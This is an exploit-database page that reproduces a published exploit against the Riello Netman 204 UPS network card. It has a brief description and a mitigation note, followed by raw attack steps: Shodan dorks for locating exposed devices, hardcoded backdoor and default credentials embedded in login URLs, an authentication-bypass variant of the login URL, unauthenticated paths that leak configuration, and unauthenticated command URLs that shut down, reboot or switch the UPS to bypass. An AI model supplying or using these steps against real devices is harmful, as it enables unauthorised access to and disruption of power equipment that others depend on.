header-logo
Suggest Exploit
vendor:
Netman 204
by:
parsa rezaie khiabanloo
8.1
CVSS
CRITICAL
Authentication Bypass, Command Injection
287
CWE
Product Name: Netman 204
Affected Version From: Netman 204
Affected Version To: Netman 204
Patch Exists: NO
Related CWE: CVE-2025-XXXX (Yet to be assigned)
CPE: h:riello-ups:netman-204
Metasploit:
Other Scripts: https://www.infosecmatter.com/metasploit-module-library/?mm=auxiliary/gather/cloud_lookuphttps://www.infosecmatter.com/metasploit-auxiliary-modules-detailed-spreadsheet/https://www.infosecmatter.com/why-your-exploit-completed-but-no-session-was-created-try-these-fixes/
Platforms Tested: Windows, Linux
2025

Netman 204 – Remote Command Execution without Authentication

The Netman 204 device is vulnerable to unauthorized access and command injection. Attackers can exploit this vulnerability to execute remote commands without authentication. By using specific URLs, attackers can access different panels with default or backdoor credentials, allowing them to view critical information and perform actions without proper authorization.

Mitigation:

To mitigate this vulnerability, it is recommended to ensure that proper authentication mechanisms are implemented, and access control is strictly enforced. Additionally, users should change default credentials and keep the device firmware up to date.
Source

Exploit-DB raw data:

# Exploit Title: Netman 204 - Remote command with out authentication
# Date: 2/4/2025
# Exploit Author: parsa rezaie khiabanloo
# Vendor Homepage: netman-204 (https://www.riello-ups.com/downloads/25-netman-204)
# Version: netman-204
# Tested on: Windows/Linux

Step 1 : Attacker can using these dorks then can find the UPS panel .

Shodan :   http.favicon.hash:22913038  OR  https://www.shodan.io/search?query=netman+204+cgi-bin

# We Found Two panel  Yellow and blue 

Step 2 : For Yellow panel attacker can use these username and password because there have backdoor and for Blue panel we can use the Remote commands  and burpsuite repeater to see the details of the ups .

Yellow Panel : username and password : eurek

Some exploits for that :

http://[IP]/cgi-bin/login.cgi?username=eurek&password=eurek
or
https://[IP]/cgi-bin/login.cgi?username=eurek&password=eurek

Due to flaws in parameter validation, the URL can be shortened to:

http://[IP]/cgi-bin/login.cgi?username=eurek%20eurek
or
https://[IP]/cgi-bin/login.cgi?username=eurek%20eurek


Blue Panel : username and password : admin

Some Critical leaks without authentication we can see : 

http://IP/administration-commands.html
http://IP/administration.html
http://IP/administration.html#
http://IP/administration.html#LDAP
http://IP/administration.html#active-users
http://IP/administration.html#firmware-upgrade
http://IP/configuration.html
http://IP/history.html
http://IP/index.html
http://IP/login.html
http://IP/system-overview.html
http://IP/table.html

#With using up paths we can see the details of the UPS without authentication .

First open burpsuite and intercept the requests then use the up paths and after that send that request to the repeater then send it again and in your response open the render and enjoy :) 

Some Remote commands without authentication : 

http://IP/administration-commands.html
http://IP/administration-commands.html#
http://IP/administration-commands.html#reboot-irms
http://IP/administration-commands.html#reboot-mdu
http://IP/administration-commands.html#reboot-xts
http://IP/administration-commands.html#shutdown
http://IP/administration-commands.html#shutdown-irms
http://IP/administration-commands.html#shutdown-mdu
http://IP/administration-commands.html#shutdown-restore
http://IP/administration-commands.html#shutdown-restore-irms
http://IP/administration-commands.html#shutdown-restore-mdu
http://IP/administration-commands.html#shutdown-restore-xts
http://IP/administration-commands.html#shutdown-xts
http://IP/administration-commands.html#shutdownrestore
http://IP/administration-commands.html#switch-irms
http://IP/administration-commands.html#switch-on-bypass
http://IP/administration-commands.html#test-battery

Navigation

Suggest Exploit

Services By CQR